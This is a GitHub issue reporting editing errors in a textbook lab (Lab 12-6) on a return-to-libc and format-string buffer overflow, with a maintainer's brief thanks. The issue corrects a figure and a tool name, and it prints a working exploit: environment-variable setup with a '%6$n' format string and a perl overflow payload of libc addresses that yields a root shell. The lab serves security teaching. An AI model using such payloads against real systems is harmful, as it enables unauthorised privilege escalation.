Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Lab 12-6 - Multiple editing issues #3

Open
e3prom opened this issue Jul 12, 2018 · 1 comment
Open

Lab 12-6 - Multiple editing issues #3

e3prom opened this issue Jul 12, 2018 · 1 comment

Comments

@e3prom
Copy link

e3prom commented Jul 12, 2018

Not directly related to this repository, but I've found several editing issues inside the Lab 12-6 section:

The figure has no 'Figure' tag (same goes for the figure in the previous lab). Not a big deal though, however there is two description errors inside the diagram. The third field after the buffer is written as '%3$n' which doesn't match the format string '%6$n' used later in the FMTSTR environment variable. Note that both the third direct parameter and the sixth are working on my setup, but mixing both can be a little bit confusing.

Also I think the figure's arrow 'Saved EIP' points to 'Addr of execl()' and not to 'Addr of printf()' as it should be. As soon as the overflow in the vulnerable function occurs, the first call should be to 'printf()' and not to 'execl()'.

Also the arrow to 'Return Address After printf()' should point to 'Addr of execl()', as it's the second function to call after printf().

A bit further, the code block showing the use of environment variables and the execution of './getenv' is a bit wrong. As the utility has been renamed to report the correct env variable addresses, it should be called './gtenv', as bellow:

$ export FMTSTR="%6\$n"
echo $FMTSTR
%6$n
$ ./gtenv FMTSTR
FMTSTR is located at 0xffffdf18
$ export WRAPPER="./wrapper"
$ echo $WRAPPER
./wrapper
$ ./gtenv WRAPPER
WRAPPER is located at 0xffffdf13

As a side note, I do confirm the successful exploitation on amd64:

$ ./vuln2 `perl -e 'print "A"x15 . "\xc0\x4a\xe2\xf7" . "\x40\x25\xe9\xf7" . "\x18\xdf\xff\xff" . "\x13\xdf\xff\xff" . "\x13\xdf\xff\xff" . "\xcc\xd5\xff\xff"'`
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),100(users)

The only change made is to compile 'vuln2.c', 'wrapper.c' and 'getenv.c' using the '-m32' gcc flag.

Regards

@harperaa
Copy link
Collaborator

Thanks for that feedback and sharing with others.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants